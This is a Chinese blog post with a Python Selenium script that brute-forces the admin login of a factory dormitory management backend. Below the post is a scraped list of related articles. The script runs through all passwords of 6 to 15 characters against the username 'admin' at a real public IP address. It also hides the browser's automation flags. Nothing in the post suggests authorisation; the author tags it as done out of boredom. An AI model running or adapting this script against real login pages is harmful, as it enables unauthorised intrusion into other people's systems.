title: 某厂区宿舍管理后台密码爆破-selenium测试

author: 杨晓东

permalink: 某厂区宿舍管理后台密码爆破-selenium测试

date: 2021-10-02 11:27:04

categories:

- 嗯哼

tags:

- 无聊

某厂区宿舍管理后台密码爆破-selenium测试



from selenium import webdriver

import time

import itertools

# 装饰器 计算时间

def time_out(a_func):

    def clocked(*args, **kwargs):

        start = time.time()

        result = a_func(*args, **kwargs)

        end = time.time()

        print("程序:" + a_func.__name__, "    运行时间:" + str(end - start))

        return result

    return clocked

# 请求方法

@time_out

def get(driver, url, count, use):

    driver.get(url)

    driver.implicitly_wait(10)

    """

    数字 + 小写字母 + 大写字母 + 符号

    :return:

    """

    chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*?_-."

    for a in range(6,16):

        for c in itertools.product(chars, repeat=a):

            count += 1

            password = ''.join(c)

            driver.implicitly_wait(10)

            print("................................开始自动填充密码 爆破中.......................................")

            # 用户名 admin

            user = driver.find_element_by_id("txtUserName")

            user.click()

            user.clear()

            user.send_keys(use)

            # 密码爆破开始

            paswd = driver.find_element_by_id("txtPwd")

            paswd.click()

            paswd.clear()

            # 页面输入密码

            paswd.send_keys(password)

            # 网页 js 密码注入

            # js_code = 'document.getElementById("lgPwd").innerHTML="{}";'.format(password)

            # print(js_code)

            # driver.execute_script(js_code)

            # 点击登陆按钮

            driver.find_element_by_id("btnLogin").click()

            driver.implicitly_wait(15)

            # 关闭密码错误提示框

            # driver.find_element_by_css_selector('#pop_163370375869635439 > div.popBox > div.ttBox > a').click()

            # 刷新界面

            driver.refresh()

            print('*************** 第 ' + str(count) + ' 组密码 ***************')

            print("当前 ",a,"  位密码测试")

            print("用户名:",use)

            print("密码:",password)

# 程序入口

if __name__ == '__main__':

    # 标识 当前目录

    # url = "http://tplogin.cn/"

    url = "http://183.230.147.88:8081/"

    use = 'admin'

    count = 0

    # 去除浏览器被控  字样

    options = webdriver.ChromeOptions()

    options.add_experimental_option("excludeSwitches", ['enable-automation'])

    options.add_experimental_option('useAutomationExtension', False)

    driver = webdriver.Chrome(options=options)  # driver = webdriver.Chrome(executable_path=r'D:PATHchromedriver.exe')?

    get(driver, url,count,use)

一个厂区宿舍管理后台密码爆破 - selenium版的更多相关文章

  1. 拼凑一个ABP VNext管理后台

    介绍 本项目前后端分离,后端采用ABP VNext框架,前端Vue. 项目地址: https://github.com/pojianbing/AuthCenter 目前包含的模块有: 身份认证管理 I ...

  2. 从0到1用react+antd+redux搭建一个开箱即用的企业级管理后台系列(基础篇)

    背景 ​ 最近因为要做一个新的管理后台项目,新公司大部分是用vue写的,技术栈这块也是想切到react上面来,所以,这次从0到1重新搭建一个react项目架子,需要考虑的东西的很多,包括目录结构.代码 ...

  3. django admin后台(数据库简单管理后台)

    只需要简单的几行胆码就可以生成一个完整的管理后台 这个就是django魅力之一 创建超级用户 python manage.py createsuperuser     ----  之后会提示输入用慕名 ...

  4. 【Python】神器:Streamlit,仅使用Python开发一个运维管理后台(不需要编写html,js,css)

    背景 作为SRE,我们有很多很多自动化的工具,大部分都是自动运行的,还有一部分是CLI,我们一直苦于没有一个自己的管理后台网站,受限于前端能力薄弱,开发出来的网页只能说凑活能用,但是不好用. 现在我们 ...

  5. 【转】手摸手,带你用vue撸后台 系列四(vueAdmin 一个极简的后台基础模板)

    前言 做这个 vueAdmin-template 的主要原因是: vue-element-admin 这个项目的初衷是一个vue的管理后台集成方案,把平时用到的一些组件或者经验分享给大家,同时它也在不 ...

  6. [Xcode 实际操作]九、实用进阶-(28)在iTunes Connect(苹果商店的管理后台)中创建一个新的新的APP

    目录:[Swift]Xcode实际操作 本文将演示如何在iTunes Connect(苹果商店的管理后台)中创建一个新的新的APP. 首先要做的是打开浏览器,并进入[iTunesConnect网站], ...

  7. 简单使用Laravel-admin构建一个功能强大的后台管理

    Laravel-admin可以快速构建一个功能强大的后台,方便快速开发. 以下内容记录简单使用Laravel-admin,以及遇到小错误的解决方法. Laravel-admin 依赖以下环境 需要提前 ...

  8. activemq设置后台管理用户名密码,及生产者消息密码

    activemq设置后台管理用户名密码,及生产者消息密码 1.修改conf/activemq.xml 在<broker>标签下,找到</shutdownHooks>标签.在这个 ...

  9. 写了一个vue+antdv的后台管理模板

    1,项目简介 写在前面===>这是一个vue+antdv的后台管理模板 项目地址: https://github.com/BaiFangZi/vue-antd-manage 1.1,概述 ​ 最 ...

  10. Tomcat默认界面可导致版本信息泄露+管理后台爆破

    由于配置的Tomcat时,管理页面未进行删除或者权限角色配置,攻击者可以通过暴力猜解进入到管理后台,从而上传获取shell. Tomcat的默认工具manager配置,在很多的生产环境中由于基本用不到 ...

随机推荐

  1. Kubernetes环境鉴权与自动发现

    概览文章中提到了k8s的鉴权模式,简单回顾下: RBAC: Role-based access control 是基于角色的访问控制 ABAC: Atrribute-based access cont ...

  2. uniapp微信小程序 原生底部导航栏

    在pages.json文件中写  "tabBar": { "color": "#333333", "selectedColor&q ...

  3. axios 中get 和post传参

    axios中get和ppost传参的方式: params是添加到url的请求字符串中的,一般用于get请求. data是添加到请求体(body)中的, 一般用于post请求. 上面,只是一般情况. 其 ...

  4. (已转)Linux基础第七章 线程

    前言 之前讨论了进程,了解一个进程能做一件事情,如果想同时处理多件事情,那么需要多个进程,但是进程间很不方便的一点是,进程间的数据交换似乎没有那么方便.Linux提供线程功能,能在一个进程中,处理多任 ...

  5. DevExpress 的LayoutControl控件导致资源无法释放的问题处理

    现象记录 前段时间同事发现我们的软件在加载指定的插件界面后,关闭后插件的界面资源不能释放, 资源管理器中不管内存,还是GDI对象等相关资源都不会下降. 问题代码 问题的代码大概如下. public v ...

  6. 10.关于synchronized的一切,我都写在这里了

    大家好,我是王有志.关注王有志,一起聊技术,聊游戏,从北漂生活谈到国际风云. 之前我们已经通过3篇文章由浅到深的分析了synchronized的用法和原理: synchronized的基础:synch ...

  7. Random概述和基本使用-Random生成指定范围的随机数

    Random概述和基本使用 什么是Random类 此类的实例用于生成伪随机数. 例如,以下代码使用户能够得到一个随机数: Random r = new Random(); int i = r.next ...

  8. (Crack)SQL转Linq工具的使用——Linqer

    官方下载网站:http://www.sqltolinq.com/ 这是干什么用的         就是Sql语句转Linq  给不熟悉的小白用 再用Linq 转 Lambda      (用到Linq ...

  9. ChatGPT留给知乎、小红书的时间不多了

    大家好啊,今天我打算给大家整点好活!挑战一下用ChatGPT打入各平台内部. 知乎挑战! 首先了解一下"知乎体" 知乎体是以专业知识为基础,以清晰的条理对问题进行阐述,并解决该问题 ...

  10. 嵌入式Linux—FreeType矢量字体

    freetype矢量字体 常用API 1.FT_Init_FreeType函数是FreeType库中的一个函数,其作用是初始化FreeType库,并返回一个指向FT_Library对象的指针.下面是该 ...